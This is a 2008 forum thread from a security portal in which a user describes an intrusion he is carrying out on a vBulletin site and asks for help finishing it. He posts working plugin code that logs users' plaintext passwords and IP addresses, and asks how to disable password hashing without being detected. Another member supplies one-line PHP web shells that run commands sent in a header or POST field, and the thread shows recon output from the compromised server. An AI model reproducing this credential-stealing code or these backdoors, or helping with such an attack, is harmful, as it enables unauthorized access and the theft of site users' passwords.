 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Need help finishing the job :D |
 |
 Posted: Wed Sep 17, 2008 4:08 am |
 |
|
| ayvegh |
| Regular user |
 |
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
 |
|
 |
|
Hi everybody.
I've hacked a very large vBulletin-powered site.
I'm knowledgeable in PHP, MySQL, etc.
I have access to phpMyAdmin using the username/password from the config.php file, and I have installed my own little "swiss army knife" script so I can manipulate things from a script perspective.
I do NOT have FTP access 
I do know, however, that the Admin of the site uses the same password for everything, so if I can manage to catch his password as he logs in, I will have complete control over the entire server (it's a dedicated rig; I'm able to browse the root of the machine using my script, although obviously my permissions are limited, since I'm running as the PHP user).
I've unobtrusively installed a plugin which catches all logins - here's what the plugin code and save table look like:
Plugin:
| Code: | | $vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (userid, username, password, password_md5, password_md5_utf, ipaddress) VALUES (" . $vbulletin->userinfo['userid'] . ", '" . $vbulletin->db->escape_string($vbulletin->userinfo['username']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password_utf']) . "', '" . $vbulletin->db->escape_string(IPADDRESS) . "' )"); |
Table:
| Code: | CREATE TABLE `loginz` (
`logid` int(10) NOT NULL auto_increment,
`userid` int(10) NOT NULL default '0',
`username` varchar(100) NOT NULL default '',
`password` varchar(255) NOT NULL,
`password_md5` varchar(255) NOT NULL,
`password_md5_utf` varchar(255) NOT NULL,
`ipaddress` varchar(15) NOT NULL default '',
`date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
PRIMARY KEY (`logid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1; |
What I need to know is: How can I disable the automatic MD5-ing of the password by the JavaScript in the login form?
I know that this line:
| Code: | | define('DISABLE_PASSWORD_CLEARING', true); |
works to do that if it's in the config.php file, but can it be implemented via a plugin?
If not, is there a way I can disable just the JavaScript in the login form (I want to remain relatively undetected, so I won't turn off AJAX for the entire site, even though there is an option for that)?
Any help regarding this will be very much appreciated, and I thank you in advance.
ayvegh |
|
|
|
|
|
|
|
|
| Posted: Wed Sep 17, 2008 5:29 am |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password. |
|
|
|
|
|
|
|
|
| Posted: Wed Sep 17, 2008 5:55 am |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
| koko wrote: | | Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password. |
I know one of the Admin's passwords, the other one that he uses everwhere.
It's not the same on here, and the MySQL password is randomly generated.
I've gone through every other site hosted on the server; none of them are even live anymore, and none of them have valid password data in them.
What do you mean by "shell"? Do you have any sample shell scripts I could look at? |
|
|
|
|
|
|
|
|
| Posted: Wed Sep 17, 2008 7:07 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Something like
| Code: | | <?php $footer = @getenv('HTTP_FOOTER'); if($footer) {@passthru($footer); exit;} ?> |
Working with headers
FOOTER:ls -al |
|
|
|
|
| Posted: Wed Sep 17, 2008 11:49 pm |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
Hmm... now I'm really confused.
I have read-only access to the root of the filesystem.
What would that script accomplish?
Many thanks,
ayvegh |
|
|
|
|
| Posted: Thu Sep 18, 2008 5:23 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| ayvegh wrote: | Hmm... now I'm really confused.
I have read-only access to the root of the filesystem.
What would that script accomplish?
Many thanks,
ayvegh |
This shell don't give you root perm's.nobody or apache in best way owner/owner
Try FOOTER:id |
|
|
|
|
| Posted: Fri Sep 19, 2008 4:26 am |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
I hate to sound like such a noob, but I have two questions:
1. What are you trying to accomplish with these shell scripts?
2. How do I use these scripts? <?php exec(); ?> ?
Thanks again,
ayvegh |
|
|
|
|
| Posted: Fri Sep 19, 2008 5:32 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| ayvegh wrote: | I hate to sound like such a noob, but I have two questions:
1. What are you trying to accomplish with these shell scripts?
2. How do I use these scripts? <?php exec(); ?> ?
Thanks again,
ayvegh |
1.Social injeenering.
2.Only like this <?php @exec('cmd'); ?>
Working with POST cmd=ls -al |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 19, 2008 5:54 am |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
Hmm... that's not any form of social engineering I know of, but hey, I'm the noob here, right? 
Okay, so I ran this code from my location in the web directory:
| Code: | $output = NULL;
@exec("ls -al /", $output);
print_r($output); |
And got this output:
| Code: | Array
(
[0] => total 125
[1] => drwxr-xr-x 22 root root 4096 2007-05-08 12:21 .
[2] => drwxr-xr-x 22 root root 4096 2007-05-08 12:21 ..
[3] => drwxr-xr-x 2 root root 4096 2008-06-01 09:17 bin
[4] => drwxr-xr-x 4 root root 1024 2008-06-01 09:18 boot
[5] => lrwxrwxrwx 1 root root 11 2007-05-08 12:16 cdrom -> media/cdrom
[6] => drwxr-xr-x 13 root root 3900 2008-04-02 06:47 dev
[7] => drwxr-xr-x 72 root root 4096 2008-06-01 09:19 etc
[8] => drwxr-xr-x 6 root root 4096 2007-07-01 14:59 home
[9] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 initrd
[10] => lrwxrwxrwx 1 root root 28 2007-05-08 12:18 initrd.img -> boot/initrd.img-2.6.18-4-686
[11] => drwxr-xr-x 12 root root 12288 2008-06-01 09:17 lib
[12] => drwx------ 2 root root 16384 2007-05-08 12:14 lost+found
[13] => drwxr-xr-x 3 root root 4096 2007-05-08 12:16 media
[14] => drwxr-xr-x 2 root root 4096 2006-10-28 16:06 mnt
[15] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 opt
[16] => dr-xr-xr-x 183 root root 0 2008-04-02 06:46 proc
[17] => drwxr-xr-x 11 root root 4096 2008-06-18 14:24 root
[18] => drwxr-xr-x 2 root root 4096 2008-06-01 09:17 sbin
[19] => drwxr-xr-x 2 root root 4096 2007-03-07 23:56 selinux
[20] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 srv
[21] => drwxr-xr-x 11 root root 0 2008-04-02 06:46 sys
[22] => drwxrwxrwt 21 root root 36864 2008-09-19 07:47 tmp
[23] => drwxr-xr-x 11 root root 4096 2007-05-10 18:32 usr
[24] => drwxr-xr-x 14 root root 4096 2007-05-10 18:31 var
[25] => lrwxrwxrwx 1 root root 25 2007-05-08 12:18 vmlinuz -> boot/vmlinuz-2.6.18-4-686
) |
What does that do for me, aside from telling me that I can't do much in the root directory (unless I'm reading those chmod letters wrong)?
Thanks again,
ayvegh |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 19, 2008 6:30 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Try with pwd
Then ls -al /bla/bla/ from pwd result |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 19, 2008 6:12 pm |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
Okay, so I've refined my code a bit:
| Code: | | print_r(shell_exec('pwd')); |
All that gives me is the directory string of where my script is located:
| Code: | | /var/www/[redacted]/www/[redacted] |
Doing this:
| Code: | | print_r(shell_exec('ls -al ' . shell_exec('pwd'))); |
Gives me the directory listing for my scripts location, which looks like this:
| Code: | total 124
drwxrwxrwx 2 10001 www-data 4096 2008-09-15 08:02 .
drwxr-xr-x 26 10001 www-data 4096 2008-09-01 15:59 ..
-rw-r--r-- 1 10001 www-data 1848 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 6664 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 0 2008-04-25 20:50 index.html
-rw-r--r-- 1 www-data www-data 6099 2008-09-15 08:01 redacted.php <-- My script, created using an exploit in the ACP ;)
-rw-r--r-- 1 10001 www-data 7223 2006-11-24 10:26 redacted.php
-rw-r--r-- 1 10001 www-data 5689 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 2108 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 2819 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 30243 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 7633 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 1659 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 1098 2005-09-16 05:00 redacted.php
-rw-r--r-- 1 10001 www-data 10754 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 3443 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 534 2006-04-05 05:00 redacted.php
-rw-r--r-- 1 10001 www-data 4032 2008-04-25 20:50 welcomeblock.php
|
But I have all of that information already, as I said.
The "My script" highlighted above is what I'm using to execute these commands.
It has a built-in filebrowser/downloader (I'm adding zipping and maybe RAR functions soon), and a code executor, inputted via the address bar in Base64.
So what does this do for me? 
Thanks again for your patience,
ayvegh |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 19, 2008 8:13 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Sep 19, 2008 8:26 pm |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
| Code: | | print_r(shell_exec('id')); |
gives
| Code: | | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
|
|
|
|
|
| Posted: Sat Sep 20, 2008 8:12 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Show me
ls -al /var/www/[redacted]/www/ |
|
|
|
|
| Posted: Sun Sep 21, 2008 2:07 am |
|
|
| ayvegh |
| Regular user |
|
|
| Joined: Sep 17, 2008 |
| Posts: 12 |
|
|
|
|
|
|
|
| koko wrote: | Show me
ls -al /var/www/[redacted]/www/ |
No need to post the whole thing- here's a directory and a file:
| Code: | total 3110
drwxr-xr-x 4 10001 www-data 4096 2008-09-01 16:18 admincp
-rw-r--r-- 1 10001 www-data 39174 2008-01-27 01:00 global.php |
Having seen the FTP users database (and unsuccessfully adding a user), I can tell you that userid 10001 is the Admin's FTP account.
Any way to reverse MySQL PASSWORD() hashing? |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
